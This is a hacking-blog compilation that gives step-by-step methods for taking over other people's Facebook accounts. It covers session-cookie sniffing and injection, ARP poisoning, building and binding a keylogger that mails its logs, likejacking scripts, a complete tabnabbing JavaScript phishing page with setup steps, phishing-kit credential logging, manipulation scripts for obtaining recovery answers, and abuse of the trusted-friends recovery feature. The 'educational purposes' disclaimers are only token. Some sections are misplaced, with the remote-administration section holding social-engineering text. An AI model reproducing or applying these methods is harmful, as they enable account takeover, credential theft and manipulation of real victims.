Facebook Hacking Methods All In One
So You Guys wanna Learn Facebook Hacking. ..How to Hack Facebook Accounts Easily Yeah And I Mean It.
So Here Goes All Methods Of Facebook Hacking From Zero To One .. .
Let's Go.
Before Starting I Think You Guys All Know What Is Facebook How To Use It .. That's Why You Are Here.
So Before Starting Let me Clear One thing There's No Such Software Exists Which Will Hack Facebook for You
The Only Two Methods By Which You Can Hack Facebook Is
- Hire A Professional Hacker Who Will Hack For You
- Or Just Learn All These Methods which i'm Gonna Provide you
Facebook Hacking Methods Are Following:
1. Session Hijacking Attack
2. Facebook Security
3. Cookie Stealing Attack
4. Keylogging
5. Clickjacking
6. Tabnabbing
7. Remote Administration Tools
8. Social Engineering Attack
9. Phishing attack
10. Using 3 Fake Friends Method
- Session Hijacking Attack :- What
Is Session Hijacking Attack ? Session hijacking, also known as TCP
session hijacking, is a method of taking over a Web user session by
surreptitiously obtaining the session ID and masquerading as the
authorized user. Once the user's session ID has been accessed (through
session prediction), the attacker can masquerade as that user and do
anything the user is authorized to do on the network.
Click Here To Get In Detail With Session Hijacking:
What Is Session Hijacking Attack ?
Session hijacking, also
known as TCP session hijacking, is a method of taking over a Web user
session by surreptitiously obtaining the session ID and masquerading as
the authorized user. Once the user's session ID has been accessed
(through session prediction), the attacker can masquerade as that user
and do anything the user is authorized to do on the network.
The
session ID is normally stored within a cookie or URL. For most
communications, authentication procedures are carried out at set up.
Session hijacking takes advantage of that practice by intruding in real
time, during a session. The intrusion may or may not be detectable,
depending on the user's level of technical knowledge and the nature of
the attack. If a Web site does not respond in the normal or expected way
to user input or stops responding altogether for an unknown reason,
session hijacking is a possible cause.
Step By Step Explanation Of How To Carry Out This Attack ?
First
of all, you would need to connect to an unsecured wireless connection
that others are using. Then we start capturing packets transferred over
this network. Note that your wireless adapter needs to support monitor
mode to scan all packets transferred over a network. you can check your
wi-fi card specifications to see if it supports monitor mode.
We
would then need to use a network sniffing tool so sniff packets
transferred over the network. In this case, I am using a tool called
Wireshark (Download From Here).
Within wireshark, there is a menu called "Capture"; Under the capture
menu, select interfaces from that menu, and a list of your interfaces
will come up.
Next
you select Start Next to the interface that you have enabled monitor
mode on. most times it is the interface that is capturing the most
packets. In my case, Microsoft interface is capturing the most packets,
so i will select to start capturing with the microsoft interface. You
would leave wireshark to capture packets for a couple of seconds
depending on the amount of persons currently using the network. Say 30
seconds if 10 people currently are using the network, or 30 minutes if
there is barely network activity going on. While capturing, wireshark
will look something like this.
After
capturing a certain amount of packets, or running the capture for a
certain amount of time, stop it by clicking on the stop current capture
button.
After
stopping the capture, you will need to look for the user's facebook
session cookie which, hopefully was transferred in one of the packets
captured. to find this cookie, use the wireshark search which can be
found by pressing "ctrl + f" on your keyboard. In this search interface,
select Find: By "String"; Search In: "Packet Details". and Filter by
the string "Cookie".
When
you press find, if there is a cookie, this search will find it, if no
cookie was captured, you will have to start back at step 2. However, if
youre lucky and some cookies we're captured, when you search for cookie,
your interface will come up looking like this in the diagram below. You
would notice the cookie next to the arrow contains lots of data, to get
the data. the next thing you do is to right click on the cookie and
click copy->description.
After
copying the description, paste it in a text file, and separate each
variable to a new line (note the end of every variable is depicted by a
semicolon eg - c_user=100002316516702;). After some research and
experimenting, i figured out that facebook authenticated the user
session by 2 cookies called c_user and xs. Therefore you will only need
the values of these cookies, and then need to inject them into your
browser. Before injecting the cookies, here is what my facebook page
looked like:
The
next thing you would need to do is to inject this information as your
own cookie. so firstly you would need to install a cookie manager
extension for your browser, I'm using firefox Cookie Manager. After
installing this extension, you will find it under Tools->cookie
manager. The interface for cookie manager looks like this:
The
first thing we would need to do is to clear all cookies, so clear all
the cookies you currently have. Then select the "Add Cookie" link to add
a new cookie. The first cookie you will add is the c_user cookie which
will have the following information:: Domain - ".facebook.com",
name-"c_user", value-"the value you copied earlier from the wireshark
scanning" and the Path-"/"; leave the isSecure and Expires On values to
default:
The
next thing you do is to hit the "Add" button and the cookie is saved.
Repeat the same steps to add the xs cookie with all of the same
information, except the value, which would be the xs value you have.
After
adding these 2 cookies, just go to facebook.com, refresh the page
and... Boom!! you will see you are logged in as that user whose cookie
information you stole. Here is my facebook page after i injected those
cookies:
- Facebook Security :- When
you bookmark the URL for Facebook or any of your other social networks,
be sure to use HTTPS instead of HTTP. This encrypts your
communications.
In
fact, you will have to temporarily disable this feature any time you
give access to a new application. That alone should give you confidence
that you have achieved a greater level of protection.
Click Here To Get In Detail With Facebook Security:
#1– Enable HTTPS ?
When you bookmark the URL for Facebook or any of your other social
networks, be sure to use HTTPS instead of HTTP. This encrypts your
communications.
In fact, you will have to temporarily disable this feature any time you
give access to a new application. That alone should give you confidence
that you have achieved a greater level of protection.
#2– Disable Online Chat ?
All of us have witnessed Facebook scams, with the most common being the
infamous chat message … “I’m in the UK and have been mugged – please
send money so I can get back home.”
While I have no technical basis for this, it stands to reason that the
hackers get in through the chat service. Every time I have noticed bogus
comments allegedly made by me to my Facebook friends, it is because I
had previously used the online chat.
To disable chat just click on the little wheel in the right sidebar and
take yourself offline. Then close the window and make sure is registers
as chat offline.
#3 – Review Permissions Granted to Third Party Apps ?
When you grant access to Facebook apps, those permissions endure long after you stop using them. Go to this link to
review your Facebook app permissions – and disable any you are no longer using.
You will probably be surprised at the long list permissions your have previously granted!
#4 – Activate Text Message Notifications ?
Facebook allows you to receive text notifications whenever your account
is accessed from a device other than your primary computer or mobile
device.
You simply go to Account Settings and then to Security Settings to set-up the proper notifications to your mobile device.
First go to login approvals – then login notifications.
You can only choose email or text notifications. By choosing text
notifications you not only get an immediate notice, but you also
activate both your mobile device and your primary computer as approved
access points.
#5 – Maintain Public and Private Email Addresses ?
The email address you use for Facebook should be distinct from the one
you use where security is more critical – such as your online banking or
Paypal account.
If your Facebook account gets hacked its embarrassing. If that is the
same email used on your more secure accounts, now that vulnerability
could be costly.
Obviously, if you are selective with your email addresses and
periodically change your passwords, you minimize your chances of being
hacked.
Did you know that anyone can search Facebook for an email address? For
example, if you are looking a common name such as John Smith, you only
need to search with their email to find the right one.
This is handy for finding your friends on Facebook, but also useful for
hackers. The safe bet is to use distinct passwords for your public and
private email addresses.
There are even more ways to protect your Facebook and other online
accounts, but these 5 are the most essential, and they are specific to
Facebook, which seems to be the site that is the most vulnerable.
Note: This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
- Cookie Stealing Attack :- In
this tutorial i will explain how you can hack a Facebook/twitter
accounts by stealing cookies. This method works only when the victims
computer is in a LAN (local area network ).Best place to try out this is
in schools ,collages ,cafes . where computers are connected in LAN
.Before i proceed let me first...
Click Here To Get In Detail With Cookie Stealing Attack :
In this tutorial i will explain how you can hack a Facebook/twitter
accounts by stealing cookies. This method works only when the victims
computer is in a LAN (local area network ).Best place to try out this is
in schools ,collages ,cafes . where computers are connected in LAN
.Before i proceed let me first explain cookies.
What Are Cookies ? And What Is The Use Of Stealing Cookies ?
Cookies are small files that stored on users computer by websites when a
user visits them. The stored Cookies are used by the web server to
identify and authenticate the user .For example when a user logins in
Facebook a unique string is generated and one copy of it is saved on the
server and other is saved on the users browser as Cookies. Both are
matched every time the user does any thing in his account
So if we steal the victims cookie and inject them in our browser we will
be able to imitate the victims identity to the web server and thus we
will be able to login is his account . This is called as Side jacking
.The best thing about this is that we need not no the victims id or
password all we need is the victims cookie
.
Hack Facebook / Twitter By Stealing Cookies ?
1.
Ettercap or
Cain and able for ARP poisoning the victim
2.
Wire shark for sniffing and stealing cookies
3.
Firefox browser and
Cookie logger add on for injecting the stolen cookies in our browser
1. First ARP poison the victim .For this you can refer my previous articles on how to ARP poison the victims computer using
Cain and able or
Ettercap
2. After ARP poisoning open Wire shark ,click capture button from the
menu bar , then select interface .Now select your interface (usually
eth0 ) finally click start capture .
3. Now you can see the packets being captured , wait for a while till the victim logs in his account( Facebook /twitter ),
4. Mean while Find the IP address of Facebook ,for this you can open CMD
(command prompt ) and enter .Ping Facebook.com to find its IP address
.
5. Now filter the packets by entering the the IP address (Facebook) in the filter bar and click apply
6. Now Locate HTTP Get /home.php and copy all the cookie names and values in a notepad.
7. Now open Firefox and open
add and edit cookies ,which we downloaded earlier , add all the cookie values and save them.
8. Now open Facebook in a new tab , you will be logged in the victims account .
Chris Defaulter Valentine ......you
have hacked the victims Facebook account by stealing cookies , You can
also follow the same steps to hack Twitter accounts
Hope you enjoyed this tutorial , If you have any doubts please feel free to post a comment
.
Note: This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
- Keylogging :- What
Is Keyloggers? Using key logger utility you will be able to establish
full control over your computer. You will also find out, what was going
on your computer in your absence: what was run and typed etc which act
as best children internet protection software. Using the keylogging
program constantly,...
Click Here To Get In Detail With Keylogging:
-
What Is Keyloggers?
Using
key logger utility you will be able to establish full control over your
computer. You will also find out, what was going on your computer in
your absence: what was run and typed etc which act as best children
internet protection software. Using the keylogging program constantly,
you can restore the previously typed text in case you have lost it.
Keystroke logger software works in the hidden mode and invisible on
Windows operating system including Windows 7/VISTA/XP/Server 2008/NT/98
etc.
Lets start the guide: How to use it. ?
1) first you need to download this application, you can download it from its website
Download, but currently its under maintenance..
2) I am giving tut about Neptune 1.4 only, but you can use 1.45 also, it is a updated vers
ion that sends screenshot also.
After downloading, Extract the .rar file, open the project's folder,
click on project Neptune v1.4, Now it will show a window like shown
below, Do whatever mentioned in screen shot.
Note: i am giving tut for getting logs by mail(gmail here), but you can use other also, or can use ftp server also.
3) Now go to 'Server Creation' tab and press 'Generate new server' under
'server creation', and give name of your keylogger and thats it.. you
are done :)
4) Make it self destructive :In tab Extra options, you can check 'self
destruct on ', if you want that it should be remove after any particular
date.
5) Add Icon: You can also add any icon to the final keylogger file, for that go to 'Server Creation' tab and select 'Use file
icon' under 'server settings' and select any icon file.
6) Binding: You can bind it with any other file also, for that press the
file binder button, a window will open(as shown in screen shot)then
right click and select 'add file' and then select anything for ex. any
software, movie, video, song etc. with which you wanna bind it. 5.1)
After selecting the binding file, dont close this window, and go to step
3.
7) Sreenshots: (only ava
ilable in naptune 1.45) Go to Extra options, check 'send screen shots' under 'Screenshots'
Note: This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
- Clickjacking :- What
is Clickjacking? Clickjacking is a technique used by hackers or
spammers to trick or cheat the users into clicking on links or buttons
that are hidden from normal view (usually links color is same as page
background). Clickjacking is possible because of a security weakness in
web browsers that allows...
Click Here To Get In Detail With Clickjacking :
What is Clickjacking?
Clickjacking is a technique used by hackers or spammers to trick or
cheat the users into clicking on links or buttons that are hidden from
normal view (usually links color is same as page background).
Clickjacking is possible because of a security weakness in web browsers
that allows web pages to be layered and hidden from general view. In
this situation what happens is that You think that you are clicking on a
standard button or link, like the PLAY button or download button on an
video or some stuff, but you are really clicking on a hidden link. Since
you can’t see the clickjacker’s hidden link, you have no idea what
you’re really doing. You could be downloading malware or making all your
Facebook information public without realizing it. Some good hackers
make ajax keyloggers and put them as javascripts over their fake
websites and when you open them they retrieve all your passwords stored
in web browser and records whatever you type while the web browser is
open and stores this information on their servers.
There are several types of clickjacking but the most common is to hide a
LIKE button under a dummy or fake button. This technique is called
Likejacking. A scammer or hacker might trick you by saying that you like
a product you’ve never heard. At first glance, likejacking sounds more
annoying than harmful, but that’s not always true. If you’re scammed for
liking Mark Zukenberg, the world isn’t likely to end. But you may be
helping to spread spam or possibly sending Friends somewhere that
contains malware.
How It Work ?
The like button is made hidden and it moves along with the mouse.So,
wherever the user clicks, the like button is clicked and your fan page
is liked.First download the JavaScript from the below download link.
Mediafire
After downloading the script extract all the files.Now modify the config.js and follow the below instructions.
1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.
2. There is a time out function after which the like button will not be present(move) anymore.
"time" if set to 0 will make it stay forever(which is usually not preferred).
3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible
Properly set the var in the file if it is jumbled ?
After modifying the config.js script upload these scripts to javascript hosting website.I prefer
yourjavascript you can also upload to some other website.
How To Run The Script ?
1. Add config.js just above head tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/config.js"> </script>
----------------------------------------------------------------------------------------------------------------
2. Add like.js after body tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/like.js"> </script>
----------------------------------------------------------------------------------------------------------------
Remove src link with your uploaded link.
5. That's it. The script is ready to go.
Note: This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
- Tabnabbing :- Hey
friends,It's Chris Defaulter Valentine.An Microsoft Certified Systems
Engineer (MCSE),Internet Marketer IIT hacker I Have 10 Years' Experience
Circumventing Information Security Measures And Can Report That I've
Successfully Compromised All Systems That I Targeted For Unauthorized
Access Except One. I Have...
Click Here To Get In Detail With Tabnabbing :
Hey friends,It's Chris Defaulter Valentine.An Microsoft Certified
Systems Engineer (MCSE),Internet Marketer IIT hacker I Have 10 Years'
Experience Circumventing Information Security Measures And Can Report
That I've Successfully Compromised All Systems That I Targeted For
Unauthorized Access Except One. I Have Two Years' Experience As a
Private Investigator, And My Responsibilities Included Finding People
And Their Money, Primarily Using Social Engineering Techniques. today i
am going to How to Hack emails, social networking websites and other
websites involving login information. The technique that i am going to
teach you today is Advanced Tabnabbing. I have already explained what is
basic tabnabbing today we will extend our knowledge base, i will
explain things with practical example. So lets learn..
1.
A hacker say(me Chris) customizes current webpage by editing/adding
some new parameters and variables.( check the code below for details)
2. I sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now
when user opens that link, a webpage similar to this one will open in
iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now
if victim left the new webpage open for certain period of time, the tab
or website will change to Phish Page or simply called fake page which
will look absolutely similarly to original one.
6. Now
when user enter his/her credentials (username/password), he is entering
that in Fake page and got trapped in our net that i have laid down to
hack him.
Here end's the attack scenario for advanced tabnabbing.
Before coding Part lets first share tips to protect yourself from this
kind of attack because its completely undetectable and you will never be
able to know that your account is got hacked or got compromised. So
first learn how to protect our-self from Advanced Tabnabbing.
Follow below measure to protect yourself from Tabnabbing:
1. Always
use anti-java script plugin's in your web browser that stops execution
of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If
you receive any link in the Email or chat message, never directly click
on it. Always prefer to type it manually in address bar to open it,
this may cost you some manual work or time but it will protect you from
hidden malicious URL's.
4. Best
way is to use any good web security toolbar like AVG web toolbar or
Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.
That ends our security Part. Here ends my ethical hacker duty to notify
all users about the attack. Now lets start the real stuff..
Note: Aza
Raskin was the first person to propose the technique of tabnabbing and
still we follow the same concept. I will just extend his concept to next
level.
First sample code for doing tabnabbing with the help of iframes:
<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: Chris Defaulter Valentine ( Anonymous )
-->
<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>
<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var
REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the
favicon. It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";
//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;
//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}
//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);
//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();
//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;
//Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>
</body>
</html>
Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE :
Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico (
Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.
Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other
social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free
web hosting website along
with favicon file and send the link to user in form of email or chat
message ( hidden using href keyword in html or spoofed using some other
technique).
That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..
Note: This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
- Remote Administration Tools :- A
remote administration tool (or RAT) is a program that allows certain
persons to connect to and manage remote computers in the Internet or
across a local network. A remote administration tool is based on the
server and client technology. The server part runs on a controlled
computer and receives commands...
Click Here To Get In Detail With Remote Administration Tools :
I myself have had a few people in the past ask me questions on social
engineering. I always say to anyone, you need to imagine social
engineering as a game. But before i talk about the '
Game', I want to go into detail about Basic knowledge and self preparation.
Basic knowledge and self preparation:
It's important like most things in life to be fully equipped and
prepared to take on a task. I myself would suggest you have clear
outlines of what your trying to achieve, be it to get someone's email
password, exploiting them for money, to get into a online game
group/clan etc etc. In this case the email and password of
Facebook account.
First of all, you need to take into consideration of what you will need,
for this social engineering tutorial i'm going to outline this from an
obtaining someone's email password perspective. Before i continue, i
would like to stress some important factors you might want to take into
consideration:
1) People are more open to you if they perceive you as an idiot.
2) People are less suspicious of you when you make them laugh.
3) People are more trusting if you actually take an interest in them.
I'm going to break these three points down to give you a better understanding of why this is:
In the case of 1 - nearly
everyone seems to be more careless when they perceive you as an idiot,
the main reason for that is, you don't consider someone who appears to
be an idiot as a threat. Another reason is that people tend to become
more open and arrogant when they feel they are on a higher pedistel than
you
(never forget that!). Now
there are things you need to remember however, although these things
are true if you overplay your idiot persona it will not be good in
your fortune. Always remember real morons are annoying as hell, you
DO NOT want to put off the person your trying to social engineer(unless your trying to fail, then knock yourself out).
In the case of 2 - when talking to someone it's easy to see why this rule is advised. Often it's a good ice breaker, also reinforcing the idea that
"your a nice guy", it slowly allows the person to build a relationship of 'trust' with you.
in the case of 3 - also
an obvious advisement, if you just pester someone for information
without at-least pretending to take an interest in what they are saying,
not only will you come across as rude, it will make the person wonder
why your probing them for person info.
With these three points made, i will now continue with my example of
obtaining someone's Facebook Email and password. Before you go into
detail, it's important to outline what you need to successfully social
engineer the password out of someone. Now you could try to Social
engineer them for their password, I advise you be a bit more intelligent
and indirectly social engineer them for their password by obtaining
their password recovery knowledge. Now it's important to what you need
to successfully hack their account through recovery questions. You will
need the following:
Their email address
Their account password
With this in mind it's imperative you plan how you will obtain these
details. I will tell you how i do it. But first i need you to
understand, this whole transaction will not be completed over a course
of a day, it can take days to weeks depending on the person. I suggest
you talk to them and read them first. If their open, then you can do it
within days, if their not then it would be better you spread this out
over a week or two. I also want you to imagine what you will say, try to
predict their answers and MOST OF ALL, think of a scapegoat on why your
probing them for these answers, just in case your less than suttle and
arouse suspicion, if they ever suspect you it will go from a flame to a
fire it's important to stamp all of their doubt in you as soon as
possible.
Now there are many ways you can obtain their password and addressee.
Some people and post their address on their profiles. In which case this
is easy pickings, however that is rare. So you need to devise a way of
obtaining that info. Now you can pretend that you are from bank
or something like this and ask for their email address. Or you can
pretend that you are some student an doing some research. Be creative
Now i need the answer to their security question, now you need to find
out what the question is, i suggest pretend to recover password to see
what it is or get the info for all of the recovery questions email asks.
Im going to go with the first option and say for example their recovery
question was : What is your dogs name?.
How I would go about obtaining this would be to pretend to have a pet of my own, i would start off the convo like so:
me: Ffs my dog wont stop barking, seriously where did i leave my ducktape lol!
victim: lol yeah i know sometimes my dog's the same, annoying -.-
me: Oh you have a dog? i didn't realize whats your dogs name, if you don't mind me asking.
It is important to add "if you don't mind me asking",
because it gives the person a bit of power over you and also show's a
little respect (once again reinforcing the notion your a nice fellow).
POINT: I
wouldn't dive straight into "whats your dogs name" start with the breed
first and remember try to predict what they will inturn ask (mines blah
blah whats yours?).
With that in mind, I'm sure by now you can see how easy it is, to social
engineer someone's password through the indirect method of password
recovery. Now obviously most recovery questions wont be about pets
mostly they're "mothers maiden name" "place of birth" etc.
But use the same logic and work around it, remember think every detail
through and ask yourself this if someone gave you this story or asked
you in a certain way would it seem legit to you?
and when you have the email address, click on Facebook, I forgot password and will be sent on your email.
The Game:
The game is basically, perfecting "self preparation". Social engineering
is a game,. If you think about it in this way: each time trust is given
to you, you advance a level, which each level you advance, your ability
of obtaining information from this person becomes easier. In a sense
mastering the ability to come up with more ingenious ways of
manipulating someone, without arousing suspicion, is what separates the
lucky noobs from the elites.
When thinking about this as a game, you need to reflect on your goals.
As I've mentioned before try to imagine the dialogue between you both,
think about how you will obtain certain things and more importantly have
clear directives. With this in mind i think we can now talk about how
you might want to consider presenting yourself (only applies if the person is indeed a stranger).
So if you were going to go after a complete stranger, you should first
try and get as much research on them as you can. For example, age, name.
This is important for making up for fake identity. I would also suggest
if you social engineer more than one person you write down, in detail!
your differn't alias so you don't get confused. Nothing would be worse
than using the wrong alias on the wrong person.
When building your identity decide on what would give you the biggest
advantage with this person. This can be from faking your age to match
the interests of this person, thus giving you the advantage of being
able to "click" with the person. Pretending to be a student or in a dead
end job for sympathy manipulation or in the case of a dead end job,
pretending to relate to the slave. There are many things you can do, as
I've mentioned it depends on the circumstances you need.
Social Engineering The Art of Human Hacking ?
Download Link -
Note: This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
- Social Engineering Attack :- I
myself have had a few people in the past ask me questions on social
engineering. I always say to anyone, you need to imagine social
engineering as a game. But before i talk about the 'Game', I want to go
into detail about Basic knowledge and self preparation. Basic knowledge
and self preparation: It's...
Click Here To Get In Detail With Social Engineering Attack :-
Phishing -
is an e-mail fraud method in which the perpetrator sends out
legitimate-looking email in an attempt to gather personal and financial
information from recipients. Typically, the messages appear to come from
well known and trustworthy Web sites. Web sites that are frequently
spoofed by phishers include PayPal, eBay, MSN, Yahoo, BestBuy, and
America Online. A phishing expedition, like the fishing expedition it's
named for, is a speculative venture: the phisher puts the lure hoping to
fool at least a few of the prey that encounter the bait.
1. First
a fall you need a fake login page for facebook (fake.html),and a Php
script to redirect and capture the victims passwords (login.php)
Password - @hackaholic
After you download the files, Open login.php,with a note pad and search
for the term www.enteryoursite.com and replace it with the site address
where you want the victim to be redirected ,finally save it.
Note : This
a very important step redirect the victim to a proper site other wise
the victim will get suspicious .In our case we are making fake face booklogin page so its better to redirect the victim to www.facebook.com/careers
4. Now create an account at Free web hosting site like 110mb.com , T35.com or ripway.com
5. Now
upload both the files (fake.html , login.php ) to your hosting account
and send the fake.html(fake facbook login page) link to your victim
Example:- www.yoursite.110 mb.com/fake.html
6. Now
when the victim enters all his credentials, like login name and
password in our fake login page and when he clicks login He will be
redirected to site which we did in step 3
7. Now
to see the victims id ,password, login to your hosting account
"110mb.com " where you will see a new file "log.txt" .Open it to see the
victims user id and the password
This is a simple but a very effective method to Hack face book accounts .If you have any doubts please feel free to comment !!
Note: This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
- Phishing attack :- Phishing
- is an e-mail fraud method in which the perpetrator sends out
legitimate-looking email in an attempt to gather personal and financial
information from recipients. Typically, the messages appear to come from
well known and trustworthy Web sites. Web sites that are frequently
spoofed by phishers include...
Click Here To Get In Detail With Phishing attack :- Click Me
- Using 3 Fake Friends Method :- Hack
Facebook Account" is most popular term is the in Web, Previously I
posted many articles on "Hack Facebook Accounts" with Keyloggers,
phishing, etc but that Hacking Of Facebook Account methods are not
working fine now a days. So Hackers have to go smarter and we have found
a new security hole (its just...
Click Here To Get In Detail With Using 3 Fake Friends Method :
-
- Chris Defaulter Valentine
in
- Labels: #op Facebook Hacking
Hack Facebook Account" is most popular term is the in Web, Previously I
posted many articles on "Hack Facebook Accounts" with Keyloggers,
phishing, etc but that Hacking Of Facebook Account methods are not
working fine now a days. So Hackers have to go smarter and we have found
a new security hole (its just a trick) in the FB. So we can Hack
Facebook easily. Now we can hack Facebook online with the help of new
password recovery feature of FB. So keep on reading about this new way
for Hacking Of Facebook Account. FB recently released new way to Recover
Account Password using
"Three Trusted Friends" .
If we forgot the Facebook account password then FB will send unique
security code to three friends. Then we have to ask that security code
to each three friend. And after giving that codes to FB we can recover
the Facebook password. We can use this feature to Hack Facebook Account
Free So here we are going to misuse this new feature of FB to Hack
Facebook Account. We have to just create 3 fake Fb accounts and then
have to send the friend request from those 3 fake accounts to the
victim. Victim must accept those friend request. Now we can use this
above "Three Trusted Friend" feature to reset the victims' Facebook
account password. I have given a full guide on How To Hack Facebook
Accounts.
Note - The
3 fake account must be 7 day older, otherwise this Facebook Hack will
not work So lets start on our tutorial on Hack Facebook Account.
1. Go to Facebook.com and click on Forgot Password.
2. Now
give the victim's Facebook account email or if give the FB username or
Profile name and click on search. And then you will get the victims
profile account. Just click on "This is my Account".
3. Then click on "No longer have access to this".
4. Now you will be asked to enter new email address, just enter your own new email address.
5. Now
Facebook will ask you to give security question's answer. Not to worry,
just enter wrong answer thrice and you will be taken to the new page.
6. Here
is the main part of Hacking Of Facebook Account. Click on Continue and
FB will ask you to select 3 Trusted Friends. Their will be a full
friend's list of the victim which also includes your previously created
"Three Fake Facebook Account" .
Just select that three accounts and then Facebook will send security
codes to our fake accounts. Now collect those security codes and enter
it. Then Facebook will send
"Password Recovery Email" at the email address we entered in 4th step. Thus you can easily reset the password of victim's account.
No we have successfully done with Hack Facebook Accounts
Note : We have received the problems like they don't get the new page in
step 5. So this depends on the victim's activity on Facebook account.
So friends, I hope you enjoyed this article on Hack Facebook Accounts
and if you have any problem with this Hack Facebook Account Free then
please do comment.
Note: This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get up to 40 years of
imprisonment, if got caught in doing so.
Note: This
tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get up to 40 years of imprisonment, if got caught in doing so.
Information
Note
Tip
Warning
OPTION ONE 
